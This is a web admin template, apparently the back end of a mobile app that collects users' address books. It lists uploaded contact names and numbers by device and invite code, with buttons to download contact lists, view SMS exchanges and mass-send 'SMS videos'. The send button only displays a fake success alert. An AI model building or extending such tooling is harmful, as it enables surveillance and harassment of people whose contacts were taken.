<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <title>layui</title>
  <meta name="renderer" content="webkit">
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <link rel="stylesheet" href="__PUBLIC__/layui/css/layui.css"  media="all">
  <link rel="stylesheet" href="__PUBLIC__/font-awesome/css/font-awesome.min.css" media="all" />
  <link rel="stylesheet" href="__CSS__/admin.css"  media="all">
  <style type="text/css">
/* tooltip */
#tooltip{
  position:absolute;
  border:1px solid #ccc;
  background:#333;
  padding:2px;
  display:none;
  color:#fff;
}
</style>
</head>
<body style="padding:10px;">
  <div class="tplay-body-div">
    <div class="layui-tab">
      <ul class="layui-tab-title">
        <li class="el-button el-button--success">通讯录查看管理</li>
      </ul>
    </div> 
    <form class="layui-form serch" action="{:url('admin/appv1/mobile')}" method="post">
        <div class="layui-form-item" style="float: left;">
          <div class="layui-input-inline">
            <input type="text" name="keywords" lay-verify="title" autocomplete="off" placeholder="请输入登录手机" class="layui-input layui-btn-sm">
          </div>
          <div class="layui-input-inline">
            <input type="text" name="code" lay-verify="title" autocomplete="off" placeholder="请输入邀请码" class="layui-input layui-btn-sm">
          </div>          
          <div class="layui-input-inline">
            <div class="layui-inline">
              <div class="layui-input-inline">
                <input type="text" class="layui-input" id="create_time" placeholder="通讯录上传时间" name="create_time">
              </div>
            </div>
          </div>
          <button class="el-button el-button--success layui-btn-sm" lay-submit="" lay-filter="serch">立即提交</button>
        </div>
      </form> 
    <table class="layui-table" lay-size="sm">
        <button class="el-button el-button--success sendsms" lay-submit="" lay-filter="sendsms" style="margin-left:10px;">一键发送短信视频</button>
      <colgroup>
        <col width="50">
        <col width="100">
        <col width="40">
        <col width="40">
        <col width="70">
        <col width="100">
        <col width="100">        
        <col width="400">
      </colgroup>
      <thead>
        <tr>
          <th>ID</th>
          <th>设备名称</th>
          <th>登录手机</th>
          <th>邀请码</th>          
		  <th>通讯录姓名</th>
		  <th>通讯录号码</th>
          <th>最后上传时间</th>
          <th>操作</th>
        </tr> 
      </thead>
      <tbody>
        {volist name="info" id="vo"}
        <tr>
          <td>{$vo.id}</td>
          <td>{$vo.clientid}</td>          
          <td>{$vo.name}</td>
          <td>{$vo.code}</td>
          <td>{$vo.username}</td>          
          <td>{$vo.umobile}</td>		  
          <td>{$vo.addtime|date="Y-m-d H:i:s",###}</td>
          <td class="operation-menu">
            <div class="layui-btn-group">
              <a href="{:url('appv1/exportexcel',['id'=>$vo.userid])}" class="el-button el-button--primary" title="下载通讯录数据" alt="下载通讯录数据" style="margin-right: 0;font-size:12px;">下载通讯录</a>
              <a href="{:url('appv1/sms',['smstel'=>$vo.umobile])}" class="el-button el-button--success sendsms" title="通讯录号码短信来往" alt="通讯录号码短信来往" style="margin-right: 0;font-size:12px;">通讯录号码短信来往</a></a>              
              <a class="el-button el-button--danger delete" id="{$vo.id}" title="删除数据" alt="删除数据" style="margin-right: 0;font-size:12px;">删除</i></a>
            </div>
          </td>
        </tr>
        {/volist}
      </tbody>
    </table>
    <div style="padding:0 20px;">{$info->render()}</div>

    {include file="public/foot"}
    
    <script type="text/javascript">
    $('.delete').click(function(){
      var id = $(this).attr('id');
      layer.confirm('确定要删除此条数据？（注：删除后不可恢复）', function(index) {
        $.ajax({
          url:"{:url('admin/appv1/mobdelete')}",
          data:{id:id},
          success:function(res) {
            layer.msg(res.msg);
            if(res.code == 1) {
              setTimeout(function(){
                location.href = res.url;
              },1500)
            }
          }
        })
      })
    })

    $('.sendsms').click(function(){
        layer.alert("发送短信视频成功", {
            skin: 'layui-layer-molv'
            ,closeBtn: 0
            ,anim: 4 //动画类型
            ,title:'消息提示'
        });
        return 50;
    })
    </script>
  </div>
</body>
</html>
